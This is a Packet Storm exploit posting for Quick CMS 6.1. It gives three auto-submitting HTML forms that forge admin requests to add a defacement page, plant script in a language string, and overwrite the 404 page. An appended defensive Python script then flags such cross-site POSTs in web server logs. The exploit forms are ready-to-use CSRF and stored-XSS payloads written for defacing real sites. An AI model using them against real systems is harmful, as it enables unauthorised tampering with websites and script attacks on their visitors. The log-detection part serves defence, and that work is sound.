Quick CMS 6.1 Cross Site Request Forgery / Cross Site Scripting

2016-01-21T00:00:00
ID PACKETSTORM:135348
Type packetstorm
Reporter Amir.ght
Modified 2016-01-21T00:00:00

Description

                                        
                                            `-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit Title : Quick CMS CSRF/XSS  
-# Vendor Homepage: http://opensolution.org  
-# Software Link:  
-# http://opensolution.org/download/home.html?sFile=Quick.Cms_v6.1-en.zip  
-# Version : 6.1  
-# Date: 2016-21-01  
-# Tested On : Windows 7 / FireFox  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit to create a deface page  
-# [Text] is your deface message  
-# The path of the page is: http://target.com/?(X)  
-# Exploit Code:  
<form name="addpage" method="POST"  
action="http://[URL]/admin.php?p=pages-form" />  
<input type="hidden" name="sName" value="Title Of Page" />  
<input type="hidden" name="sDescriptionFull" value="[Text]" />  
<input type="hidden" name="iStatus" value="1" />  
<input type="hidden" name="sUrl" value="(X)" />  
<input type="hidden" name="iPosition" value="0" />  
<input type="hidden" name="iMenu" value="1" />  
<input type="hidden" name="iTheme" value="1" />  
<input type="hidden" name="sOption" value="save" />  
</form>  
<script language="javascript">  
setTimeout('addpage.submit()',1);  
</script>  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit for XSS/CSRF:  
<form name="xss" method="POST"  
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />  
<input type="hidden" name="Pages"  
value="Pages<script>alert(/xss/)</script>" /> is Your js Code  
<input type="hidden" name="sOption" value="save" />  
</form>  
<script language="javascript">  
setTimeout('xss.submit()',1);  
</script>  
-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
-# Exploit to edit the Error 404 page:  
<form name="notfound" method="POST"  
action="http://[URL]/admin.php?p=languages&sLangEdit=en" />  
<input type="hidden" name="404_error" value="title+of+page" />  
<input type="hidden" name="Data_not_found" value="deface+message" />  
<input type="hidden" name="sOption" value="save" />  
</form>  
<script language="javascript">  
setTimeout('notfound.submit()',1);  
</script>  
------------------------------------------  
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
#-# Discovered by : Amir.ght -#-#  
#-# Author : Ashiyane Digital Security Team -#-#  
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#  
`
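
A detection sketch for the requests these forms generate, added here as an example and not part of the original advisory or of Quick.CMS: it scans combined-format access log lines for POSTs to the two admin.php actions named above whose Referer is missing or points at another host. The log lines, the host name cms.example and the function and variable names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Admin actions targeted by the advisory's forms (value of the "p" query parameter).
STATE_CHANGING_PAGES = {"pages-form", "languages"}

# Apache/nginx "combined" log format: request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def suspicious_admin_posts(lines, site_host):
    """Return (timestamp, ip, target, referer) for cross-site POSTs to admin.php."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/admin.php"):
            continue
        page = parse_qs(url.query).get("p", [""])[0]
        if page not in STATE_CHANGING_PAGES:
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        # An admin saving a form in the panel sends a same-host Referer; a form
        # auto-submitted from another site sends a foreign one or none at all.
        if ref_host != site_host.lower():
            hits.append((m["ts"], m["ip"], m["target"], referer))
    return hits

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Jan/2016:10:01:02 +0000] "POST /admin.php?p=pages-form HTTP/1.1" 200 5120 "http://cms.example/admin.php?p=pages-form" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Jan/2016:10:05:40 +0000] "POST /admin.php?p=pages-form HTTP/1.1" 200 5120 "http://attacker.example/page.html" "Mozilla/5.0"',
    '203.0.113.7 - - [21/Jan/2016:10:05:41 +0000] "POST /admin.php?p=languages&sLangEdit=en HTTP/1.1" 200 4300 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [21/Jan/2016:10:06:00 +0000] "GET /admin.php?p=pages-form HTTP/1.1" 200 5120 "http://attacker.example/page.html" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in suspicious_admin_posts(SAMPLE_LOG, "cms.example"):
        print(hit)
```

A missing Referer is a weaker signal than a foreign one, since browsers and proxies can strip the header, so treat those hits as leads to correlate with page or language-string changes rather than as confirmed forgeries.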